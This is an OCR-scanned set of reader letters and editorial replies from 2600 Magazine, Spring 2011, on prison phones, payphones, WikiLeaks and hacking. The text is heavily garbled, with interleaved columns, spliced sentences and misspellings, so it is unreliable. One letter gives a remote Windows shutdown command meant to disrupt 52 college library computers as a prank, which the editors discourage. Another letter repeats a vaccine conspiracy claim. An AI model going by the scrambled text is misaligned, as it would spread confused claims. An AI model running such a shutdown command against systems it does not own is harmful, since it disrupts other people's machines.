junction. I'm not saying that everyone in the world sbould be a bobbyist hacker. It has been my observation that no matter how harmless and benign a publication is.. This document is a public document .. However. Letters from Prison Dear 2600: Keep up the excellent work with your publication! I eagerly anticipate its arrival every quarter. and in sud cases we always err on the side of caution. that is satisfying in a way that a cell phone will never be for us. Being a Linux user often feels like a special kinship with immense benefits.S. It's truiy inspirational to rake what could be the worst part of your life and use it to help yourselfand others learn and grow. It is the only phone that always dials out when we want it 10. I have been down since I was 18. again and again.. il was actually forwarded from a prison I was in before here. and are still pushing their vaccine primarily on our youth and children . there is so much to learn and explore in the hacker and phone phreak world that doesn 'I have to involve confr ontations wilh the law. but for the freedom that we're supposed 10 have. I thank you for belping to keep my technological spark alive during my stay. which clearly is evidence that the U.. multiply that by 60 million and you've got epic profit. Dear 2600: The wall mounted rotary phone in our home is the most reliable phone our family has. I will be 25. You probably don't really know what you did when you practiced a form of open-handedness as you did . He who controls technology (and data) controls the wot»<!.asked me to come see if I could do something about it. it's good to ask questions and never believe blindly what you 're being told. if you wish? My next inquiry is to the community. asking if I can call. I was able to cbange my dad's account to an admin when earlier I would receive an "access denied. The centroversy here apparently lies in the belief that the VlU cine patent for the H1NJ virus was filed two years before the first HINI case was reponed. and I was forced for the second time to submit to a psych eval in which I was given jet fuel/diesel therapy. About having a piece of equipment housed in durable . Ohio The fact remains that a good land line sounds infinitely better than any ceil phone . W While we're not always able to help people in this way. press 0 to accept. There is something very fun about turning the dial. stylish black plastic. you certainly will. Weaponize knowledge. There is not one part of ill dislike. That's simply the foundation to supply power to an ever-growing Orwellian Big Brother. AU we ask in return is that you keep from getting sent back in and that you do whatever you can to keep others from being pulled into our awful prison system . The cell phone is a waste of time because people tend to text on it. to alter my allow list #44. and of having 10 stay in one place because the cord won't stretch past the kitchen. we can kiss our human rights and freedoms goodbye. I mUSI enter an ID number and PIN. I will have expectations that it will continue to make it and I will get you the subscription money before I will expect the next one. For me to make a call..

So anyway. Dear 2600: Thank you for all of your hard work throughout the years . user name.pipl. (was headed down the same road (CEH certified. aberippa will come to a black screen with some information about the machine this program is on. the paint program will start to glitch . We don 't know how it could ever be a publisher s fault when an issue is unaccounted for inside a store. we will replace any defective issues received. Boy. or phone number and they also have a bus iness searc h. If you phone in your pledge. What I mean is the outer margin is nonexistent and one word is cut off on every line . so it took a little longer for it to be difficult to live without one. page 9) and there is (JOe small change: Step 6 says 10 look for the line •<toolbaritem id=«fsxlogin">' . It is not an offset problem. as it is being reset with every click of the mouse. Otherwise. it docs limit the effecti veness of exploits like the one detailed in David 's article.) But WBAI. This is what it's all about. and software vers ion. Dear 2600: I just have a couple of things 10 share about 27 :4. though . technology as a whole was no longer fun . Thai must have been the moment when they caught up to him . am looking forward 10 a day when implants such as those described in the story become a realiry . COm. the Borders in Santa Fe. God bless .. they do have a mouse. I would imag ine I may not be the only one.. So any alternatives and specifics would help a lot. For all we know. you can vote for your favorite show at thai point. We know thai Barnes and Noble penalizes publi shers f or any missing issues.. Keep backups and don 't be afraid 10 experimen t and make mistakes . with the exception that you must authenticate with an a. The overpriced and manopolistie systems currently in place at so many facilities are basically criminal enterprises." option that acts mucb like sudo. While using the mouse and clicking the left and right mouse buttons rap idly on the screen. you can go online and plug in quotes of various system messages you see to hear other people 's experiences and learn from those. but I'm 32 and just got a computer a few months ago . I say. and all my info on that kind of stuff will be qu ite useless in its current ebook form.. I walked away for a minute . Inspiring .645 . and when I came back Microsoft Word popped up at the bonom and I clicked on it because I didn't open it and there was a box that looked like files were being transferred. Words to live by. They told me there was no way then to re cord such votes . When they do. I would highly suggest not trying to make hacking so much a career. In this case . Gordy And yet. even when the problem is totally on their end . I read 2600 for the ideas and the dead -on responses to your readers . If sending us the actual issue isn't possible. Dear 26()(): When I renewed my membership to WBAI. MotoFox Mark We know a lot of people are working on ways to make it easier for people in prison to be able to make affordable calls . What you can gather is host name. I've just taken the print route up until now .• Also FYI.. As it develops. the issue number you give doesn't match the date . ( would also like to pass along a site that should be added to the list: www. Actually.. You can avo id 17WSt of the heartache by not downloading programs or files without knowing the source . While this can be an inconvenience. page 37 . along with an alphabet soup of certs) and .:y industry is struc tured . [ Queries Dear 2600: I'd like to post an article in the 2(j()() to get some help on the side 10 Top Sec Page 38 2600 Magazine Spring 2011 . You can searcb by name and state. Feedback Dear 26()(): I just finished reading 27 :3 and very much en joyed the article "How to Tum Local Admin into Domain Admin" by David Dunn. because the margin is nOI extra large on corresponding pages .e sure any browser you 're using is updated and able to alert you to any potentially malicious pages thai could plant things on your system.53 [ 3. too) will suffice .important not to forget our technological roots and all. Lastly. Zacb Perhaps Borders gives credit for whatever issues are no longer there when the sales period ends. We support any · thing thai brings their dominance to an end. ~ou &tragon Dear 2600: On the cover of 27:4. In 17Wst cas es. I live in Maine.122 .. and my love for technology was slowly nearing its death.dmin account." 27 :4. Wmdows has a "Run as . you know. I tried to tell the operator what my favorite shows were. Dear 26()(): I've been reading your publication for years despite having no physical knowledge of the computer applications. Nice job putting that in there. It fell more like a job. We encourage people to support the station whether you love or hale our show. Is there any accounted-for way to tell WBAI that Of/The Hook is among my reasons for subscribing? "S Chris If you make a pledge to WBAI online. one for logging onto machines and one for running processes that require elevated privileges . None of this has to be difficult and usually those who try and make you believe thai hav e something to gain by making it all mysterious and ina ccess ible. I wanted to leave something small for the community that I discovered while at a local Lowes store. This site is kind of an all-in-one site that will gather irtformation from criminal/courtJpublie records to social oetwork sites on a particular person. but I received my subscriptio n as normal in the mail and it was as if your publisher/printer burned their printing plate too large or maybe the layout was sent to them too large . It is wonderful to hear of your interest in near -future advances in electro-biological coupled devices ..seek-trulb. really great issue . Simple select " Dona te to Favorite Show " under the "Support WBAT" tab . host lP. Thanks for your inquiry concerning U My Second Implant" arti cle in 27:2. to say the least! Addendum Dear 26()(): Thask you for accepting my submission! I've been a reader for ~ last 17 years and feel honored to have my work published in your mapzine .net Dear 2600: I for one would be interested in seeing an arti cle on David 's Minto Wheel project (letters 27:4). You could use this kiosk to design rooms and paint them so you could have a glance of what the paint would look like on your walls . First : "How to Find Information on PCQp[e Using the Internet" by DarX • great article and weU put together. so my abiliry to check in to alternatives or specifics is limited . The winter issue would have been 27:4.P a g e 3 9 . Some words for Salih who wrote a letter ask ing advice about how/where he should start in his hacking career. it's assumed that the show thai's on the air at that point is the one you 're supporting . Even if I'm not a computer junkie (I am an inform ation junkie) .. keep up the great mag! Pete These kinds of things do happen on occasion in the printing world. cbapo www. The article reminded me of a common practice in the Windows community of granting users admin privileges so they can install programs and manage their own computers.. [ also want to say that I was (and still am) quire impressed after reading the Helen Keller quote at the top of page 65 . Really.. New Mexico has been charging me for "periodical" without being able to scan the barcode for the past few years.. we feel like we could have done more . That should be changed to '<toolbariLem id="fsfxlogin">· . the Yellow Pages listing for "Dead Loop" points to 45 . Sec ond. a description of what exact page the problem occurs on (digital pictures via email would be helpful. Something or someo ne told me that an opportunity to vote for shows would start about now .91 connection fee) and forward them to the handful of people I would like to call .. not 27:3 . Whal does this mean ? Where can Tbegin to prevent security risks with little 10 no money? Maggie not thai easy without SOrTU! 17Wre specific in· formation to figure out exactly what was happening . I was picking out some paint one day and took notice of the paint kiosk.. its always helpful to get as much specific info as possible.. just less than $10 for collect. but that is haw this cra:.org has no obvious link to any such option . do those coordinates ever sound familiar! Please continue to be my muse .. first I would have to say that the response to your letter is accurate. I was fighting again st others instead of learning from others. email . The first fix that came to my mind was to get some local phone numbers ($ . we had a snowstorm today and I was pretty excited to be able to go online and get the cancellations info instead of waking up at six to catch the special snowstorm report . I wouldn 't call myself a Luddite. back ing was not fun any more . I shut down my computer. Salih. A giant grin crept across my face when I read that .. The company I work for has started issuing admin users two accounts. or other DIY type mechanical hacks . and sooner or later J have reviewed the article I sent you ("How to Cheat at Foursquare. This practice is as dangerous as always logging onto a UNIXlLinux system as root. Honestly. we 'll continue to track this story.. date/time. Adam Dear 2600: This is in response to C itizen warrior 's letter in 27:3. Naturally. as its the f orum tha: make s so I7WCh in the way of communication and exchange of ideas pos sible.. totally awe some! Seriously. store num ber. and that is not what the communiry of hackers is supposed to be about. etc. 2(j()() is by far a favorite of mine! I just wanted you to be aware of an "i ssu e" with my issue: 27 :3 (Winter 2010). we may see the day when we need to generate our own power. Dear 26()(): Dudes! The new issue is like.able. (It's in my calendar. That is where I need help most. Many thanks go out to the community that keeps this magazine alive. While these kiosk have no keyboards. The cost for me by debit is $5 per 15 minute call. Keep in mind that my access to information is tightly controlled. Mak.

I was like. I have loved every single issue! They have helped to advance my knowledge of the tech world immensely! But I would like your help if possible.. Now. something about the phone company that runs it. then she would hear dialing on the other end when she picked up? My question is: how much of this am I remembering correctly. Please give some insight on the pricing.. But you would also very likely get caught at it.. Is there any way I could write a batch file for all of that? If so. Oh yes. Back to the point. repeat callal-al. The Kindle is $19 while the Nook is $31. you help to make such a world a reality to you and others who might believe such things... we face a real problem. what information should be included with the photos (i.. But you can have Bell Atlantic keep trying and call you back when the line becomes available for 75 cents by dialing 3. I could never hack because the FBI would be watching out for me. Amazon set the price for our electronic subscription as well as the individual issue.. January 8th is the Manifesto's 25th." Deviant OUam This feature does still exist for those rare instances where you actually encounter a busy signal... leaving me with the ethical question of buying the Kindle version and cracking the DRM for use on the Nook or Dear 2600: I love your publication! It is excellent! I would like to ask you a question.e. Known as "Repeat Call" in the Philadelphia and tri-state area. is not going to get you on any sort of a list. unless the other person had gotten back on the phone in that brieftime period. An interesting sidenote: to this day.Dear 2600: I recently returned home from a Christmas road trip to New York and on the ride back we decided to take photos of what few payphones we could find along the way. Graham We have nothing to do with the pricing for the two books that were published by Wiley.. I realized the words he wrote are immortal. Allowing Alice's phone to remain on-hook. would it follow me? Do you ever lose it? Thank you so very much! Love the magazine! Bought every book (in cash)! An Inquisitive Youth Wow. if you're up to all sorts ofsuspicious activity. I am three months younger than the Manifesto. involved in pricing for the Volume 26 compilation and the individual electronic issues and subscription. what format do you prefer? Also. not that this is anything remotely similar to hacking in the first place." Bell Atlantic hasn't existed since 2000 and apparently Verizon hasn't gotten around to updating their recordings in all that time.1986 and served as words ofinspiration to an entire generation ofhackers. which (according to those amusing TV commercials) absolved the troubles of so many afflicted people expressing ire and frustration at their home phones as that sing-song jingle rang out over and over again . If something suspicious happens in my area. The email address to send payphone photos to is payphones@26OO. For instance. what its capabilities are. The Hacker Manifesto was indeed released on January 8. Smith.. and experimentation with no foreseeable payoff.. we could wind up making that agency extremely busy. but recently an old POTS feature popped into my mind (because the incessantly catchy commercial jingle for it popped back into Dear 2600: Transcend has a series of snow goggles with an onboard Android OS to provide a heads-up Page 40 2600 Magazine Spring 2011 . other than satisfying your own curiosity. they lose halfoftheir payment. Caboose The only way to learn is to listen to the questions you have within you and explore as much as possible to find the answers. as I re reread it tonight. I have purchased every issue since I leamed of it three years ago. I would be the first person to be checked out. We are. but printing them out and getting stamps to mail them. then prepare to do a lot of exploration. I do not recall 100 percent.. I heard that I cannot do certain things (such as subscribe to this magazine or buy anything hacker-related with a credit card) otherwise I would get "blacklisted" and if I got blacklisted.. I now have amassed all of the computers including the administrator computer IPs (I knew one of the workers). How do people manage to believe in such things? You actually think that if you bought a copy of our magazine with a credit card. We really would like to have more information than this. Sure. All the computers that the public can access have annoying administrator rights blocking us from the com- Dear 2600: I haven't had a land line telephone for over a decade now. Loyd Blankenship's words are as inspiring to me now as they were when I first read them in 1998 when I was 13. I've been listing to Off The Hook podcasts and such but I need to learn the basics to hacking. then its not the world for you. In short. If a competitor oftheirs set the price lower than Amazon S. I realized I know nothing related to hacking. etc. When is 2600s birthday? Andrew Tag Not Required we are anonymous Is this a Ms.P a g e 41 . Your phone would indeed ring distinctively to let you know that *66 was calling you back. what landmarks it may be near. the *66 feature was introduced back when we didn't all have call waiting or direct-to-voicemail rollover. If you're truly interested in being a part of the hacker world yourself. Last semester. They are the reason I became a computer engineer. the reason I reverse engineer and improve technology. So we're forced to only let competitors sell it for a higher price. though. This also gets tricky ifthe publisher isn't able to actually set the price themselves. Ifa competitor also won't let us set the price. but would Alice's phone alert with a distinctive ring. Smith we know? And you actually had a party to celebrate the anniversary? Your passion is contagious. That's more about how to face offagainst the hacker mentality. Honestly. location)? buying the more expensive one. you know. We sometimes get great pictures of payphones where vital information such as where it was seen is left out. I was recently laid off of my IT network administrator job recently due to Michigan's horrible economy and have had time to reflect on my tech skills. We're still learning how it all works and we'll continue to let our readers in on it as things play out. I am not asking because I am a little kid trying to find out how to make his neighbor's computer melt (not that that wouldn't be fun) but because I would have been more valuable at my last job if I had known how to break into our network that I set up because then I would have known how to make it more secure. how? Thank you very much for your time! NABster This is really the best prank you can come up with? This i! about as clever as yanking out a power cord. If Alice called Bob. Back in the days when not everyone had call waiting. over the past two months I have been steadily writing down all of the IP addresses of the computers. the FBI would start watching you? If that were only true. in which case you'd hear a recording telling you that the line had "become busy again" and that you had to start the process over by dialing *66 again. we would be screwed. Even figuring out how to write a batch file would be an accomplishment. mand prompt.. By acting as if such things are true. Years ago. such as whether or not this type ofa phone is seen frequently. As for when we started. Dear 2600: Keepin' it short. No charge for Repeat Dialing subscribers. There are many threats out there and its up to us to learn what's real and what's not. I plan on simply pulling up a command prompt and typing "Shutdown -m \\IP address -s". unless it's stolen nuclear materials. but without much effort on her end. That would be time consuming and allow for me to be caught. during my IT internship. and you were still charged for the failed attempt. Using this knowledge just to screw people over by shutting down machines they're using is only going to reinforce the negative stereotype of hacking. etc. You'd then pick up the phone and hear ringing (no dialing). If a publisher fails to do this. you very well might have people in law enforcement monitoring your activities. What we know is that Amazon makes it a condition that the price on the Kindle be the lowest available. and how much do some of the old-timers and phone veterans at 2600 know of this feature? What was actually happening on the CO end? Could this feature work between regions? A bit of quick Googling shows me that the *66 function appears to still be available in some modem systems and current service areas (or at least it's still in the documentation).. but the point is I do not want to have to write that for 52 different IPs. however.. You can learn all sorts of security tips for specific operating systems and setups but that S not really what hacking is all about. This usually means sending us rather large files which we're quite capable ofhandling. I have no idea when 2600 started. p-Io We absolutely accept digital photos if they're clear and detailed enough. Where would we be without those words?His words were the bits of steak: that inspired us to continue to say fuck you to Ms. Please include as much info as possible about the phone you're submitting. "repeat call. the Repeat Dialing function (as it was called in Bell Atlantic areas) was a bit more useful. I might add some text. All of them except the whopping 52 computers in the library. Learning how to bypass the security would be clever. reading.. people in our area who encounter a busy signal will hear a recording come on the line that says: "The line is busy.com. Repeat Call would have the local CO (I assume?) keep making dialing attempts on Bob's line (or just have it check the status of Bob's line?). seems like a lot of work.. my friends and I cooked up a prank to pull on the community college that we attend. and as I was finishing my party stuff. she could opt to hammer Bob's number. Are you guys still adamant about mailing in physical photos as the site suggests? Or will email submissions be acceptable in this digital era in which we live? If so. If that seems like a waste of time.. Dear 2600: I am 17 and I have been a reader of this publication for three years now. albeit a rip-off even then. and then ring back Alice if the situation was resolved. we can tell you it was January of 1984 but we'd have tofind someone who saved their first envelope to see what the exact date ofthe mailing was. Dear 2600: I'm curious about the pricing of the Kindle and Nook versions of The Best of2600.. even if that price is a penny more. It was initially only available in your own local area and gradually expanded outwards so that you could use it nationwide. My first question is: what is "blacklisted?" How does it work? And how would I get rid of it? If I moved. but found his phone line busy. Simply buying something on your credit card. We would not be at all surprised if someone actually did that. I would like to know where to start.. my head yesterday) and I recall it from my youth. Dear 2600: Thank you for such an amazing magazine. When was the first issue published? What is the 2600 birthday? I mean. I'd love to know more about this piece of my memory. I'd like to submit them..

your wish has come true (except in those parts of the world where we were forced by authorities to make a change and pUI something totally different on lite cover). I've been an international subscriber for several years.. Lucas As you con see . mostly in the pages of 2600 . Existing 2600 meetings can be used to spread the word about these. for one. I thought it may be an interesting idea to track him down and help DC and Interpol out with getting him . opinions that have finally come into the forefront. Th is isn 'tsome James Bond movie and Julian Assonge isn 't Goldfinger. and a lot of confusion in the market." people tend to know what you 're talking about. The extended title we're known by mostly is "2600. SMS and mobile data. Simply send your submission to arricles@2600. He happens to represent a whole lot of pe ople and his work would be carried on with even more energy by others if he was taken out ofservice .oops . If we can put this much tech into snow goggles. people boycott sweatshops by wearing clothing only manufactured in tbe USA . Dear 2600: What is the strangest question received for the 2600 letters page? long time for using "sweatshops. This also means thas no person can "run " them . or completely unsealed (but still sticky) . The reason so many people support this is what you should be looking at and using 10 question your own beliefs. Apple was under fire regarding the Chinese factories where iPods are made . I smell a book . I had my suspicions that it was because we meet on a different day as the rest of the clubs (we meet on the first Saturday of every month at 7:30 pm because most of our members live outside of the city and couldn't meet at the usual lime) . Bur by fighting for the right 10 embrace these ideas . free communications. 2600. it's about completely different opinions on how to deal with "clas sified" material. anyone can start their own club and impose conditions for membership. about technology. just as there would be people who couldn ~ make other days or times . 8uI if's especial ly nonsensical to believe whatever you 're told about one man being some sort of suo pernatural threat against ali that is right and good in the world. But we've never heard oj a case where an entire city was unable to attend on a Friday. Same with cars. I hope you eventually move 10 a monthly magazine . which is pretty damn cool. Would that fact cause us to not be considered an official 2600 club? Haggis This would most definitely be the reason for "'" being listed. this is how we 've done it since the first meetings back in 1987 . I've noticed that the magazines Dear 2600: This letter was inspired by The Prophet's "The Telecom Informer" articles. let's have a discussion! Jeffrey LaChord The Prophet responds: "I don ~ have any fir sthand experience with factory labor conditions in ChiTU1. For starters. If you like the idea. and wben you help people that are way up in the chain. nor is it a simple good versus evil battle that's being fought .' I try to address contemporary topics while keeping them relevant for many years. as it runs counter to all of our individualistic leanings . But there is one way to be as inclusive as possible. We have no preference with regard to month. Prophet. Every time I read them. We JUS! ask that the above apply to any meeting that has our name on it. and for which some kind of penalty would not be out of the qu estion. Dear 2600: I am just looking for answers regarding the proper title for the 2600 Hacker Quarterly. a big threat at that. please let me know . I tried to get us listed a few times. we should nol be thinking of our activities as the types of things tha: are criminal in nature . The Hacker Qunrterly" bur we're also casually re[erred to as either "2600" or "The Hacker Quarterly . Maybeso At least you've got an excus e. I encourage readers to respond 10 thi s in the letters of 2600 and spark debate... Dear 2600: Does 2600 take hacker fiction as well? Matthew Yes.. but we change the mainstream perception so that others throughout the world and in the future will also benefit from a more enlightened approach . I wonder if. great writing." In the fashion world.never mind bout my last email .. or anyone for that matter.. Dear 2600: Given the media circus around the most recent releases from WtkiLeaks and the arrest of Julian Assange. Another question for The Prophet. we 've printed a number of hacker fiction pie ces in recent years. We all love the growing pace of technology that comes from China. The world has changed as a result and we 'd best all figure out how 10 live the re. You should consider writing one. Socially conscious rappers like Vinnie paz and Immortal Technique have sung about "slave labor." lfyou refer 10 us if! the streets as "that hacker zlne. Anyone is allowed to attend and all ages and backgrounds are welcome . and every Sunday. Ofcourse.com and make sure to tell us it's fiction as we can be extremely gullible. We've gotten suggestionsfor the first Saturday.Australia . I've heard of vending machines that you can order from using SMS. For one thing. More importantly. There have always been people who couldn't make the first Friday . I feel like I'm brought to a futuristic world that's a cross between /984 and Akira. Here's the way I think about it. I may be able to text my microwave at home and tell it to heat up my dinner in 15 minutes. The fashion world has been under scrutiny for a Dear 2600: Shit . If it goes down successful.. about good and bad stuff in life .. Free ads can be taken out in OUT magazine by subscribers 10 lei the world know of these other gatherings . On WikiLeaks Dear 2600: I just read an article about Interpol looking for Jul ian Assange (the WtkiLeaks creator).I'm drunk. Non-2600 meetings can happen anytime under any conditions. This guy is and has been a threat. and number [except that being a quarterly. Is it possible to boycott certain companies that use questionable labor by not buying computers from them? I hope this raises some interesting issues for our letters section .." A little while back. In 'The Telecom Inform er. The idea of getting a free pass to do God knows what in exchange for this type of service is wrong for a number of reasons . I'm sure you're getting many letters about the topic. but never got a response besides the usual auto-response. shared content.) However. concern ing the day issue. smart phones.. We now also have the annual "Hacker Digest" (electronic) which 0J1ds all sorts ofother fun naming possibilities . 1. We're not big fans of the idea . Dear 2600: I sincerely hope that Julian Assange is on the cover of your next issue . volume.P a g e 4 3 . Thanks. GPS location. year. My question to The Prophet and readers of 2600 is: What are your thoughts on the labor methods used to make some of our beloved technology? It's no secret that China has sometimes used questionable methods of labor in the manufacturing of technology and other hou sehold item s like clothing. We think this would be very confusing and almost impossible to list.. How do you normally seal the envelopes for international mailing? pseudored We will check with the folks who handle the intemational subscriptions and make sure the envelopes are sticky enough or consistently taped. the hacker comm unity should never be in service 10 any government agency. Now. bur you're not even close. You could have done a lot of wrongs in life and the one right takes away all the wrongs you have done. Dear 2600: I currently run a 2600 club in Brisbane. (I noted that the 2600 site is even bosting a mirror of the Wikil.. Can you write about these kinds of interesting uses of technology? I would like to hear more about how SMS is used in vending machines. due /0 technology and the actions of a few key people. We've been active for a couple of years now. Having the meetings on the same day worldwide (the time is completely open) makes it easy 10 remember what day is "meeting day. etc.. We should also take a momera to point out that the meetings we have are not pan of any club and that attendees are fWI considered members of anything . Sometimes it works the opposite way.. Telecommunications plans is a tough job . "f orbidde n " knowledge .display in the lower right comer of the lens thaI shows speed. and everything in between. it 's more than likely all the other agencies down below them begin to cut you some slack in the future and/or use this as a good dealing chip in your favor. have some serious reservations about Maybeso Page 42 2600 Magazine Spring 2011 . it's earning brownie points with DC and Interpol .. Open source software . alth ough I doubt any job is worse than being an outside plant technician during a lightning storm in America. arrive to me with the envelope ftap only lightly sealed. We're stili open to suggestion on other ideas.." We've invited feedback on al ternative ways to do this bur nothing has come of it. I was wondering why that was . The Hacker Quarterly [month] [year] {volume I [number] 2600: The Hacker Quarterly [month year] 2600: The Hacker Quarterly [month year] {volume] [number] or other title? Ridlard It's strange how you didn't include the one yo« used ill your first semence before asking the ques tion .. In China and Europe . sorry. we not only keep ourselves from being labeled as crimina ls. can you imagine the possibilities available for the use of this technology in other fields? Josbua It does sometimes keep us up III nights . To fellow readers . you would be quite foolish to assume you 'd be safe in such a situation . we doll ~ ever use months in the first place} . Lately.. We are not soldiers or some kind of military resource to be explo ited at will . Bluetooth refrigerators. but at least you'd realize that this isn 't about one per son . third Thursday.101. Here's the way I think. It's just an idea. Look for more on this topic when the dust settles . You may wind up comi ng to the same conclusion. Dear 2600. altitude." On the other question: " Mo· bile payments are an exciting and growing area." HW Nice try. Whicb is the proper title: 2600 Magazine : The Hacker Quarterly {manthl{yearl 2600 Magazjne . There is a major convergence happening between RFID.. no matter where in the world or where in the supply chain you are. in the near future. these are oil concepts that many in the mainstream view with hostility and suspicion. and most are in Assange's favor. Rather. But we think the system is working about as well as it ever has.. there is even SMS banking.eaks site currently. Sometimes the envelope flap is taped closed . They should never be completely unsealed.

1 also appreciate the individuals who committed the attacks and the many who lent their computer cycles to accomplish the same . and pointed to the rich history of programmers and tinkerers that embody the hacking spirit." Not merely because it involves ISPs and even countries upping their security and enforcing firewalls . Did you guys really not know about it . I did. which is why I've decided to write in and share a past experience that to this day still pisses me off . Just recently. but that would be missing the point. Let 's hack. if the Stephen Consider that the net is set up in such a way where anyone with sufficient access can take OOwn Their enemies and that the people doing this will not always be on your side . 1 can't tell if he was crazy or merely an incred ible ego ist. Worried Mother We don't 00 this sort of thing for hire or to reach these kinds oj conclusions. who support Wikil. After two tries. 1 guessed it nonetheless and felt empowered. wherever thai may happen to be at the moment. the rock star way that Assange has gone about it has left a decidedly bad taste in my mouth . I auempted to crack the code. Inspired by your ability to outsmart technological devices. seemingly quite comfortable with his name and photo appearing everywhere . Pay Pal . Continuing to try and convillCe your daughter that he 's no good will likely only make their bond strong er. You can check me out (obviously) normal parent . Home Address. but because this sort of thing is extremely unconstitutional . I know this sounds silly. in the end. or demonstrate. However. are on the defensive. Dear 2600: As a Jewish mother. That is how you can really help . and the like .Instead. we discussed RAM acquisition and how a wealth of information could be found sitting in memory. but more so by the kinds of comments you see in a second rate advice column . College deleted] Wanted Dear 2600: I'm surprised that your latest issue isn't buzzing about this so-called "Anti-Counterfeiting Trade Agreement. Given the fact that some of the countries wbose secrets he was spilling have no problems with solving political inconveniences with. So consider this a calljor something that addresses this head ~n. or other WikiLeak. MasterCard. Visa. it's certainly not the first time we 've heard these opinions. We're not hosting a mirror. is this . Bur even jin. too . WikiLeaks' MO seems to be the old hacker mantra of "information needs to be free. I hope you don't fallon the floor laughing at this .d out if someone graduated from a college. Franklin Well. I received this email from her : "I am a hacker! When my mom and Lindsay arrived in Florida . period. Thi s is how one learns to embrace the hacker spirit. you should be supportive of her and there to listen if she has any doubts or uncertainties about where this is all going . the attack s were meant 10 stick a proverbial middle finger in the air at Amazon. I can 't help but wonder if perhaps Assange's long-range goal was to make his name known. This is about freedom. "hackers. Not that I'm for piracy. We the people . we could say that all they had to do was call the cab le company to get the info they were ob viously entitled to. but this is more than personal matters. Age. And who's to say that's not happening already? I do think there was some value in releas ing the information that Wikil. however. It would be so easy when the information is literally corning straight to him. In the meantime. It is inde ed that feeling of empowerment one gets when a system or policy is outsmarted that is so contagious to all of us. You sho uld also seriously cons ider that you might be wrong . However. though.ding this out is not likely to change your [eelings about this person. First . reasoned discussion rarely grabs headlines. Our hackers take down their sites. This became necessary when sites began to disappear as the behest ofcertain authorities. our plans were thwarted when we realized that my morn's old password which allowed her to order "on demand" movies no longer worked with the new cable box . Of course. 1 took a class in digital forens ics . 1 must admit I'm kind of glad to see him humbled a bit. Dear 26()(): Discoveries Dear 2600: 1 recently let my girlfriend into the wonderful world of hacking . The motives of people's involvement can always be questioned. She was hooked . We would certainly devote a good deal of space to an art icle that ad dressed its dangers and how hackers might fit in with the fight aga inst it . even though you don't know me . but if the organization itself is ultimately doing some thing positive.• etc . It all/ails apart when disun ity dominates. Listen . However. I want to know if he is lyingl lf he is. I am going to appeal to your sense of duty! I know. We trust you don't really believe that will somehow shield you from prying eyes. and Assange and others decided which ones were worth releasing. I hope other members of the hacker community get the chance to voice reasoned opinions about all parts of this affair. while working on a degree in information security. But. especially Spring 2011 Page 45 . and. the validity of his sexual assault cbarges aside. we decided to watch Sex and the City 2 (horrible decision). Sadly. "read" me out. let 's try getting the word of what we're all about into more places so that the authorities feel compelled to restrict things in order to keep othersfrom hearing what we have to say . nor an exclusive possession . I am terribly conflicted about Page 44 2600 Magazine Dear 2600: First I'd like to say that I'm a new subscriber and love the magazine. And yes. even when I lied and said I was a prospective employer. while the tech nerd in me just wants to say damn the man and damn the consequences. this sounds ridicu lous. It's especially disturbing to see other organizations purporting to 00 similar things tearing down each other's efforts . This is precisely why we need informed people to write det ailed pieces from a perspective we can ail identify with . ACfA is kind of supposed to be a secret so shhhhb! What I really want to know . they discovered that the cable box in my mom's house was not working. not too keen about. Last night . somebody had to say it. During the course. There are many reason s. however. however. giving press intervie ws. It's not that hard to jin. she was doing research and I showed her how to view source in the browser and find embedded PDFs for download and offline use. Recent events worldwide have shown thai shutting off access isn 't a very popular move in the eyes of the people. Instead . or did Big Brother tape your mouth shut about it? I would strongly encourage you to at least put an article out about it. AnOIlYIPOUS this issue because the rational side of me agrees that the backlash by stupid people in power will be disproportionate to whatever actual banns took place .eaks bas released . About a year ago . but the ACTA threat is definitely one we should all be aware of. you did send us this letter in hex which made it stand out like a sore thumb. Q correction . 1 am just able to use the computer for email etc . success! The code was "0000" . to target these organizations for leaks! In this way. No textbook or classroom could ever come close . even when the message is offensive to us . the real issue is whether having the ability to release such documents makes the world a better place . As for your feelings on the personalities involved in all of this . without throwing it on the floor when 1 cannot find something. My daughter is dating a guy that my husband and 1 are. I would be more than happy to make a contribution .not the most difficult combo to guess . then it should be supported. The Cisco Kid Sure .also known as "the Ev il Empire") have already made clear they have no morals . B. Dear 2600: I appreciate you proposing alternatives to the DoS attacks in support of WikiLea. we tum hackers into weapons of one side or another. A look at their yearbook would quickly answer that question and many colleges post that info on their websites . Thought you might get a kick out of that." ~ Rather. My husband told me about your magazine. It'S also worth noting that the documents that WikiLeaks released were not obtained by Assange himself. they will not give me the information. their hackers take down ours . I would like you to do me an enormous favor ." but the way that Assange has made seemingly no attempt to establish or protect his anonymity seems very uri-hacker-ish.Assange 's motivations. You're likely to be able to do a whole 10/ more good people you care about aren 't dri ven away by this sort of disagreement . so I seriously admire computer freaks . The reason this is in binary is becau se they probably have DPls and packet sniffers running for this sort of discussion. as I'm not.com to the actual WildLeaJcs site.eaks. then there are other things that would make sense . But . but merely pointing wildleLJks2600. A few weeks later . Our community is a strong community. The other side (the organizations illegally harassing W1kiLeaks . before his arrest. not that you are one! Please help me with this little task. Instead.I would just like to know if he did or did not graduate. and one that could do some 1 have tried calling the school. he was jet-setting around. to say the least . or use any other strategy.ks. The class was started as an introduction to a new forensi cs program the school was preparing to offer and was taught by one of the security instructors. our Internet can become stronger than their Empire. Let 's not become the ones wJw 00 that . and isn 't thai what hacking is about ? Freedom to do whate ver you want? hjdn shadows " Whatever you want " might be a bit much for most to handle. Especially the letters section. By someho w equati ng hacking with raking down a site . Sometimes it's more effe ctiv e to let your opponent speak OUI and show their true colors. Freedom of information is not a competition. real good against it. they went to TIme Warner and picked up a new one. then use that name to blackmaiJ companies and governments to keep their information unreleased." I thought you guy s might get a kick of it. here is his information : [Name. So . The only thing the Empire fears is leaks coming from within their own iUegal investigations. they were submitted by anonymous contributors.well-placed bullets. The fa ct is that these types of issues aren't solved by the kinds of actions you see on a second rate TV show. We trust this wasn't the kind of response you ex pected from the hacker community. 1 helped clear up some of the discrepancies in nomenclature and media portrayal. 1am sure it will take you less than a minute. sane etc . In my mind . Not really what we signed up for. As such. Ther e are so many topics to cover in our pages and we all have our own unique experiences and fields of expertise.

